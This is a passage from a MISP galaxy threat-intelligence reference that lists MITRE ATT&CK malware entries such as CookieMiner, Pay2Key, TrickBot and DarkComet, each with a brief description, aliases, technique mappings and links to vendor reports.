  • similar: misp-galaxy:android="Kemoge" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1404" with estimative-language:likelihood-probability="almost-certain"

Table 7638. Table References

Links

https://attack.mitre.org/software/S0294

https://blog.lookout.com/blog/2015/11/04/trojanized-adware/

CookieMiner - S0492

[CookieMiner](https://attack.mitre.org/software/S0492) is macOS-based malware that targets information associated with cryptocurrency exchanges and also enables cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.(Citation: Unit42 CookieMiner Jan 2019)

The tag is: misp-galaxy:mitre-malware="CookieMiner - S0492"

CookieMiner - S0492 is also known as:

  • CookieMiner

Table 7639. Table References

Links

https://attack.mitre.org/software/S0492

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

Pay2Key - S0556

[Pay2Key](https://attack.mitre.org/software/S0556) is a ransomware written in C++ that has been used by [Fox Kitten](https://attack.mitre.org/groups/G0117) since at least July 2020, including in campaigns against Israeli companies. [Pay2Key](https://attack.mitre.org/software/S0556) has been paired with a leak site that displays stolen sensitive information to further pressure victims into payment.(Citation: ClearSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)

The tag is: misp-galaxy:mitre-malware="Pay2Key - S0556"

Pay2Key - S0556 is also known as:

  • Pay2Key

Table 7640. Table References

Links

https://attack.mitre.org/software/S0556

https://research.checkpoint.com/2020/ransomware-alert-pay2key/

https://www.clearskysec.com/fox-kitten/

DDKONG - S0255

[DDKONG](https://attack.mitre.org/software/S0255) is a malware sample that was part of a campaign by [Rancor](https://attack.mitre.org/groups/G0075). [DDKONG](https://attack.mitre.org/software/S0255) was first seen used in February 2017. (Citation: Rancor Unit42 June 2018)

The tag is: misp-galaxy:mitre-malware="DDKONG - S0255"

Table 7641. Table References

Links

https://attack.mitre.org/software/S0255

https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

MarkiRAT - S0652

[MarkiRAT](https://attack.mitre.org/software/S0652) is a remote access Trojan (RAT) compiled with Visual Studio that has been used by [Ferocious Kitten](https://attack.mitre.org/groups/G0137) since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)

The tag is: misp-galaxy:mitre-malware="MarkiRAT - S0652"

MarkiRAT - S0652 is also known as:

  • MarkiRAT

Table 7642. Table References

Links

https://attack.mitre.org/software/S0652

https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/

Cuba - S0625

[Cuba](https://attack.mitre.org/software/S0625) is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.(Citation: McAfee Cuba April 2021)

The tag is: misp-galaxy:mitre-malware="Cuba - S0625"

Cuba - S0625 is also known as:

  • Cuba

Table 7643. Table References

Links

https://attack.mitre.org/software/S0625

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf

KGH_SPY - S0526

[KGH_SPY](https://attack.mitre.org/software/S0526) is a modular suite of tools used by [Kimsuky](https://attack.mitre.org/groups/G0094) for reconnaissance, information stealing, and backdoor capabilities. [KGH_SPY](https://attack.mitre.org/software/S0526) derived its name from PDB paths and internal names found in samples containing "KGH".(Citation: Cybereason Kimsuky November 2020)

The tag is: misp-galaxy:mitre-malware="KGH_SPY - S0526"

KGH_SPY - S0526 is also known as:

  • KGH_SPY

Table 7644. Table References

Links

https://attack.mitre.org/software/S0526

https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

Kazuar - S0265

[Kazuar](https://attack.mitre.org/software/S0265) is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. (Citation: Unit 42 Kazuar May 2017)

The tag is: misp-galaxy:mitre-malware="Kazuar - S0265"

Kazuar - S0265 is also known as:

  • Kazuar

Table 7645. Table References

Links

https://attack.mitre.org/software/S0265

https://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/

Mosquito - S0256

[Mosquito](https://attack.mitre.org/software/S0256) is a Win32 backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). [Mosquito](https://attack.mitre.org/software/S0256) is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. (Citation: ESET Turla Mosquito Jan 2018)

The tag is: misp-galaxy:mitre-malware="Mosquito - S0256"

Mosquito - S0256 is also known as:

  • Mosquito

Table 7646. Table References

Links

https://attack.mitre.org/software/S0256

https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf

SUNSPOT - S0562

[SUNSPOT](https://attack.mitre.org/software/S0562) is an implant that injected the [SUNBURST](https://attack.mitre.org/software/S0559) backdoor into the SolarWinds Orion software update framework. It has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020.(Citation: CrowdStrike SUNSPOT Implant January 2021)

The tag is: misp-galaxy:mitre-malware="SUNSPOT - S0562"

SUNSPOT - S0562 is also known as:

  • SUNSPOT

Table 7647. Table References

Links

https://attack.mitre.org/software/S0562

https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/

UPPERCUT - S0275

[UPPERCUT](https://attack.mitre.org/software/S0275) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045). (Citation: FireEye APT10 Sept 2018)

The tag is: misp-galaxy:mitre-malware="UPPERCUT - S0275"

UPPERCUT - S0275 is also known as:

  • UPPERCUT

  • ANEL

Table 7648. Table References

Links

https://attack.mitre.org/software/S0275

https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html

VERMIN - S0257

[VERMIN](https://attack.mitre.org/software/S0257) is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code. (Citation: Unit 42 VERMIN Jan 2018)

The tag is: misp-galaxy:mitre-malware="VERMIN - S0257"

VERMIN - S0257 is also known as:

  • VERMIN

Table 7649. Table References

Links

https://attack.mitre.org/software/S0257

https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/

LookBack - S0582

[LookBack](https://attack.mitre.org/software/S0582) is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using [LookBack](https://attack.mitre.org/software/S0582).(Citation: Proofpoint LookBack Malware Aug 2019)(Citation: Dragos TALONITE)(Citation: Dragos Threat Report 2020)

The tag is: misp-galaxy:mitre-malware="LookBack - S0582"

LookBack - S0582 is also known as:

  • LookBack

Table 7650. Table References

Links

https://attack.mitre.org/software/S0582

https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770

https://www.dragos.com/threat/talonite/

https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks

OldBoot - S0285

[OldBoot](https://attack.mitre.org/software/S0285) is an Android malware family. (Citation: HackerNews-OldBoot)

The tag is: misp-galaxy:mitre-malware="OldBoot - S0285"

OldBoot - S0285 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1398" with estimative-language:likelihood-probability="almost-certain"

Table 7651. Table References

Links

http://thehackernews.com/2014/01/first-widely-distributed-android.html

https://attack.mitre.org/software/S0285

RGDoor - S0258

[RGDoor](https://attack.mitre.org/software/S0258) is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. [RGDoor](https://attack.mitre.org/software/S0258) has been seen deployed on web servers belonging to Middle Eastern government organizations. [RGDoor](https://attack.mitre.org/software/S0258) provides backdoor access to compromised IIS servers. (Citation: Unit 42 RGDoor Jan 2018)

The tag is: misp-galaxy:mitre-malware="RGDoor - S0258"

RGDoor - S0258 is also known as:

  • RGDoor

Table 7652. Table References

Links

https://attack.mitre.org/software/S0258

https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/

Javali - S0528

[Javali](https://attack.mitre.org/software/S0528) is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.(Citation: Securelist Brazilian Banking Malware July 2020)

The tag is: misp-galaxy:mitre-malware="Javali - S0528"

Javali - S0528 is also known as:

  • Javali

Table 7653. Table References

Links

https://attack.mitre.org/software/S0528

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

RCSAndroid - S0295

[RCSAndroid](https://attack.mitre.org/software/S0295) is Android malware. (Citation: TrendMicro-RCSAndroid)

The tag is: misp-galaxy:mitre-malware="RCSAndroid - S0295"

RCSAndroid - S0295 is also known as:

  • RCSAndroid

RCSAndroid - S0295 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Other Network Medium - T1438" with estimative-language:likelihood-probability="almost-certain"

Table 7654. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/

https://attack.mitre.org/software/S0295

InnaputRAT - S0259

[InnaputRAT](https://attack.mitre.org/software/S0259) is a remote access tool that can exfiltrate files from a victim’s machine. [InnaputRAT](https://attack.mitre.org/software/S0259) has been seen out in the wild since 2016. (Citation: ASERT InnaputRAT April 2018)

The tag is: misp-galaxy:mitre-malware="InnaputRAT - S0259"

InnaputRAT - S0259 is also known as:

  • InnaputRAT

Table 7655. Table References

Links

https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/

https://attack.mitre.org/software/S0259

CarbonSteal - S0529

[CarbonSteal](https://attack.mitre.org/software/S0529) is one of a family of four surveillanceware tools that share a common C2 infrastructure. [CarbonSteal](https://attack.mitre.org/software/S0529) primarily deals with audio surveillance. (Citation: Lookout Uyghur Campaign)

The tag is: misp-galaxy:mitre-malware="CarbonSteal - S0529"

CarbonSteal - S0529 is also known as:

  • CarbonSteal

Table 7656. Table References

Links

https://attack.mitre.org/software/S0529

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

P8RAT - S0626

[P8RAT](https://attack.mitre.org/software/S0626) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)

The tag is: misp-galaxy:mitre-malware="P8RAT - S0626"

P8RAT - S0626 is also known as:

  • P8RAT

  • HEAVYPOT

  • GreetCake

Table 7657. Table References

Links

https://attack.mitre.org/software/S0626

https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

TrickBot - S0266

[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) was developed and initially used by [Wizard Spider](https://attack.mitre.org/groups/G0102) for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of "big game hunting" ransomware campaigns.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)(Citation: IBM TrickBot Nov 2016)(Citation: CrowdStrike Wizard Spider October 2020)

The tag is: misp-galaxy:mitre-malware="TrickBot - S0266"

TrickBot - S0266 is also known as:

  • TrickBot

  • Totbrick

  • TSPY_TRICKLOAD

Table 7658. Table References

Links

https://attack.mitre.org/software/S0266

https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/

https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick

https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n

RCSession - S0662

[RCSession](https://attack.mitre.org/software/S0662) is a backdoor written in C++ that has been in use since at least 2018 by [Mustang Panda](https://attack.mitre.org/groups/G0129) and by [Threat Group-3390](https://attack.mitre.org/groups/G0027) (Type II Backdoor).(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro Iron Tiger April 2021)(Citation: Trend Micro DRBControl February 2020)

The tag is: misp-galaxy:mitre-malware="RCSession - S0662"

RCSession - S0662 is also known as:

  • RCSession

Table 7659. Table References

Links

https://attack.mitre.org/software/S0662

https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf

https://www.secureworks.com/research/bronze-president-targets-ngos

https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

FELIXROOT - S0267

[FELIXROOT](https://attack.mitre.org/software/S0267) is a backdoor that has been used to target Ukrainian victims. (Citation: FireEye FELIXROOT July 2018)

The tag is: misp-galaxy:mitre-malware="FELIXROOT - S0267"

FELIXROOT - S0267 is also known as:

  • FELIXROOT

  • GreyEnergy mini

Table 7660. Table References

Links

https://attack.mitre.org/software/S0267

https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html

https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf

Keydnap - S0276

Keydnap is a piece of macOS malware that steals the content of the user’s keychain while maintaining a permanent backdoor. (Citation: OSX Keydnap malware)

The tag is: misp-galaxy:mitre-malware="Keydnap - S0276"

Keydnap - S0276 is also known as:

  • Keydnap

  • OSX/Keydnap

Table 7661. Table References

Links

https://attack.mitre.org/software/S0276

https://www.synack.com/2017/01/01/mac-malware-2016/

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

SodaMaster - S0627

[SodaMaster](https://attack.mitre.org/software/S0627) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)

The tag is: misp-galaxy:mitre-malware="SodaMaster - S0627"

SodaMaster - S0627 is also known as:

  • SodaMaster

  • DARKTOWN

  • dfls

  • DelfsCake

Table 7662. Table References

Links

https://attack.mitre.org/software/S0627

https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

Zox - S0672

[Zox](https://attack.mitre.org/software/S0672) is a remote access tool that has been used by [Axiom](https://attack.mitre.org/groups/G0001) since at least 2008.(Citation: Novetta-Axiom)

The tag is: misp-galaxy:mitre-malware="Zox - S0672"

Zox - S0672 is also known as:

  • Zox

  • Gresim

  • ZoxRPC

  • ZoxPNG

Table 7663. Table References

Links

https://attack.mitre.org/software/S0672

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

OBAD - S0286

OBAD is an Android malware family. (Citation: TrendMicro-Obad)

The tag is: misp-galaxy:mitre-malware="OBAD - S0286"

OBAD - S0286 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

Table 7664. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/

https://attack.mitre.org/software/S0286

FYAnti - S0628

[FYAnti](https://attack.mitre.org/software/S0628) is a loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2020, including to deploy [QuasarRAT](https://attack.mitre.org/software/S0262).(Citation: Securelist APT10 March 2021)

The tag is: misp-galaxy:mitre-malware="FYAnti - S0628"

FYAnti - S0628 is also known as:

  • FYAnti

  • DILLJUICE stage2

Table 7665. Table References

Links

https://attack.mitre.org/software/S0628

https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

TrailBlazer - S0682

[TrailBlazer](https://attack.mitre.org/software/S0682) is a modular malware that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2019.(Citation: CrowdStrike StellarParticle January 2022)

The tag is: misp-galaxy:mitre-malware="TrailBlazer - S0682"

TrailBlazer - S0682 is also known as:

  • TrailBlazer

Table 7666. Table References

Links

https://attack.mitre.org/software/S0682

https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/

Bisonal - S0268

[Bisonal](https://attack.mitre.org/software/S0268) is a remote access tool (RAT) that has been used by [Tonto Team](https://attack.mitre.org/groups/G0131) against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020)

The tag is: misp-galaxy:mitre-malware="Bisonal - S0268"

Bisonal - S0268 is also known as:

  • Bisonal

Table 7667. Table References

Links

https://attack.mitre.org/software/S0268

https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html

https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/

QUADAGENT - S0269

[QUADAGENT](https://attack.mitre.org/software/S0269) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: Unit 42 QUADAGENT July 2018)

The tag is: misp-galaxy:mitre-malware="QUADAGENT - S0269"

QUADAGENT - S0269 is also known as:

  • QUADAGENT

Table 7668. Table References

Links

https://attack.mitre.org/software/S0269

https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/

RainyDay - S0629

[RainyDay](https://attack.mitre.org/software/S0629) is a backdoor tool that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)

The tag is: misp-galaxy:mitre-malware="RainyDay - S0629"

RainyDay - S0629 is also known as:

  • RainyDay

Table 7669. Table References

Links

https://attack.mitre.org/software/S0629

https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf

FruitFly - S0277

FruitFly is designed to spy on macOS users. (Citation: objsee mac malware 2017)

The tag is: misp-galaxy:mitre-malware="FruitFly - S0277"

FruitFly - S0277 is also known as:

  • FruitFly

Table 7670. Table References

Links

https://attack.mitre.org/software/S0277

https://objective-see.com/blog/blog_0x25.html

ZergHelper - S0287

[ZergHelper](https://attack.mitre.org/software/S0287) is iOS riskware that was unique due to its apparent evasion of Apple’s App Store review process. No malicious functionality was identified in the app, but it presents security risks. (Citation: Xiao-ZergHelper)

The tag is: misp-galaxy:mitre-malware="ZergHelper - S0287"

ZergHelper - S0287 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Detect App Analysis Environment - T1440" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

Table 7671. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/

https://attack.mitre.org/software/S0287

iKitten - S0278

[iKitten](https://attack.mitre.org/software/S0278) is a macOS exfiltration agent (Citation: objsee mac malware 2017).

The tag is: misp-galaxy:mitre-malware="iKitten - S0278"

iKitten - S0278 is also known as:

  • iKitten

  • OSX/MacDownloader

Table 7672. Table References

Links

https://attack.mitre.org/software/S0278

https://objective-see.com/blog/blog_0x25.html

XcodeGhost - S0297

[XcodeGhost](https://attack.mitre.org/software/S0297) is iOS malware that infected at least 39 iOS apps in 2015 and potentially affected millions of users. (Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)

The tag is: misp-galaxy:mitre-malware="XcodeGhost - S0297"

XcodeGhost - S0297 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1414" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 7673. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/

http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/

https://attack.mitre.org/software/S0297

Proton - S0279

[Proton](https://attack.mitre.org/software/S0279) is a macOS backdoor focusing on data theft and credential access (Citation: objsee mac malware 2017).

The tag is: misp-galaxy:mitre-malware="Proton - S0279"

Proton - S0279 is also known as:

  • Proton

Table 7674. Table References

Links

https://attack.mitre.org/software/S0279

https://objective-see.com/blog/blog_0x25.html

KeyRaider - S0288

[KeyRaider](https://attack.mitre.org/software/S0288) is malware that steals Apple account credentials and other data from jailbroken iOS devices. It also has ransomware functionality. (Citation: Xiao-KeyRaider)

The tag is: misp-galaxy:mitre-malware="KeyRaider - S0288"

KeyRaider - S0288 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"

Table 7675. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/

https://attack.mitre.org/software/S0288

NotCompatible - S0299

[NotCompatible](https://attack.mitre.org/software/S0299) is an Android malware family that was used between at least 2014 and 2016. It has multiple variants that have become more sophisticated over time. (Citation: Lookout-NotCompatible)

The tag is: misp-galaxy:mitre-malware="NotCompatible - S0299"

NotCompatible - S0299 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1428" with estimative-language:likelihood-probability="almost-certain"

Table 7676. Table References

Links

https://attack.mitre.org/software/S0299

https://blog.lookout.com/blog/2014/11/19/notcompatible/

UBoatRAT - S0333

[UBoatRAT](https://attack.mitre.org/software/S0333) is a remote access tool that was identified in May 2017.(Citation: PaloAlto UBoatRAT Nov 2017)

The tag is: misp-galaxy:mitre-malware="UBoatRAT - S0333"

UBoatRAT - S0333 is also known as:

  • UBoatRAT

Table 7677. Table References

Links

https://attack.mitre.org/software/S0333

https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/

DarkComet - S0334

[DarkComet](https://attack.mitre.org/software/S0334) is a Windows remote administration tool and backdoor.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)

The tag is: misp-galaxy:mitre-malware="DarkComet - S0334"

DarkComet - S0334 is also known as:

  • DarkComet

  • DarkKomet

  • Fynloski

  • Krademok

  • FYNLOS

Table 7678. Table References

Links

https://attack.mitre.org/software/S0334

https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/DARKCOMET

Rifdoor - S0433

[Rifdoor](https://attack.mitre.org/software/S0433) is a remote access trojan (RAT) that shares numerous code similarities with [HotCroissant](https://attack.mitre.org/software/S0431).(Citation: Carbon Black HotCroissant April 2020)

The tag is: misp-galaxy:mitre-malware="Rifdoor - S0433"

Rifdoor - S0433 is also known as:

  • Rifdoor

Table 7679. Table References

Links

https://attack.mitre.org/software/S0433

https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/

SLOTHFULMEDIA - S0533

[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017.(Citation: CISA MAR SLOTHFULMEDIA October 2020)(Citation: Costin Raiu IAmTheKing October 2020) It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.(Citation: USCYBERCOM SLOTHFULMEDIA October 2020)(Citation: Kaspersky IAmTheKing October 2020)

In October 2020, Kaspersky Labs assessed [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is part of an activity cluster it refers to as "IAmTheKing".(Citation: Kaspersky IAmTheKing October 2020) ESET also noted code similarity between [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) and droppers used by a group it refers to as "PowerPool".(Citation: ESET PowerPool Code October 2020)

The tag is: misp-galaxy:mitre-malware="SLOTHFULMEDIA - S0533"

SLOTHFULMEDIA - S0533 is also known as:

  • SLOTHFULMEDIA

  • JackOfHearts

  • QueenOfClubs

Table 7680. Table References

Links

https://attack.mitre.org/software/S0533

https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/

https://twitter.com/CNMF_CyberAlert/status/1311743710997159953

https://twitter.com/ESETresearch/status/1311762215490461696

https://twitter.com/craiu/status/1311920398259367942

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a

Carbon - S0335

[Carbon](https://attack.mitre.org/software/S0335) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. [Carbon](https://attack.mitre.org/software/S0335) has been selectively used by [Turla](https://attack.mitre.org/groups/G0010) to target government and foreign affairs-related organizations in Central Asia.(Citation: ESET Carbon Mar 2017)(Citation: Securelist Turla Oct 2018)

The tag is: misp-galaxy:mitre-malware="Carbon - S0335"

Carbon - S0335 is also known as:

  • Carbon

Table 7681. Table References

Links

https://attack.mitre.org/software/S0335

https://securelist.com/shedding-skin-turlas-fresh-faces/88069/

https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/

NOKKI - S0353

[NOKKI](https://attack.mitre.org/software/S0353) is a modular remote access tool. The earliest observed attack using [NOKKI](https://attack.mitre.org/software/S0353) was in January 2018. [NOKKI](https://attack.mitre.org/software/S0353) has significant code overlap with the [KONNI](https://attack.mitre.org/software/S0356) malware family. There is some evidence potentially linking [NOKKI](https://attack.mitre.org/software/S0353) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)

The tag is: misp-galaxy:mitre-malware="NOKKI - S0353"

NOKKI - S0353 is also known as:

  • NOKKI

Table 7682. Table References

Links

https://attack.mitre.org/software/S0353

https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/

https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/

NanoCore - S0336

[NanoCore](https://attack.mitre.org/software/S0336) is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.(Citation: DigiTrust NanoCore Jan 2017)(Citation: Cofense NanoCore Mar 2018)(Citation: PaloAlto NanoCore Feb 2016)(Citation: Unit 42 Gorgon Group Aug 2018)

The tag is: misp-galaxy:mitre-malware="NanoCore - S0336"

NanoCore - S0336 is also known as:

  • NanoCore

Table 7683. Table References

Links

https://attack.mitre.org/software/S0336

https://cofense.com/nanocore-rat-resurfaced-sewers/

https://researchcenter.paloaltonetworks.com/2016/02/nanocorerat-behind-an-increase-in-tax-themed-phishing-e-mails/

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://www.digitrustgroup.com/nanocore-not-your-average-rat/

Astaroth - S0373

[Astaroth](https://attack.mitre.org/software/S0373) is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. (Citation: Cybereason Astaroth Feb 2019)(Citation: Cofense Astaroth Sept 2018)(Citation: Securelist Brazilian Banking Malware July 2020)

The tag is: misp-galaxy:mitre-malware="Astaroth - S0373"

Astaroth - S0373 is also known as:

  • Astaroth

  • Guildma

Table 7684. Table References

Links

https://attack.mitre.org/software/S0373

https://cofense.com/seeing-resurgence-demonic-astaroth-wmic-trojan/

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research

BadPatch - S0337

[BadPatch](https://attack.mitre.org/software/S0337) is a Windows Trojan that was used in a Gaza Hackers-linked campaign.(Citation: Unit 42 BadPatch Oct 2017)

The tag is: misp-galaxy:mitre-malware="BadPatch - S0337"

BadPatch - S0337 is also known as:

  • BadPatch

Table 7685. Table References

Links

https://attack.mitre.org/software/S0337

https://researchcenter.paloaltonetworks.com/2017/10/unit42-badpatch/

FlawedGrace - S0383

[FlawedGrace](https://attack.mitre.org/software/S0383) is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.(Citation: Proofpoint TA505 Jan 2019)

The tag is: misp-galaxy:mitre-malware="FlawedGrace - S0383"

FlawedGrace - S0383 is also known as:

  • FlawedGrace

Table 7686. Table References

Links

https://attack.mitre.org/software/S0383

https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505

Micropsia - S0339

[Micropsia](https://attack.mitre.org/software/S0339) is a remote access tool written in Delphi.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)

The tag is: misp-galaxy:mitre-malware="Micropsia - S0339"

Micropsia - S0339 is also known as:

  • Micropsia

Table 7687. Table References

Links

https://attack.mitre.org/software/S0339

https://blog.radware.com/security/2018/07/micropsia-malware/

https://blog.talosintelligence.com/2017/06/palestine-delphi.html

PowerStallion - S0393

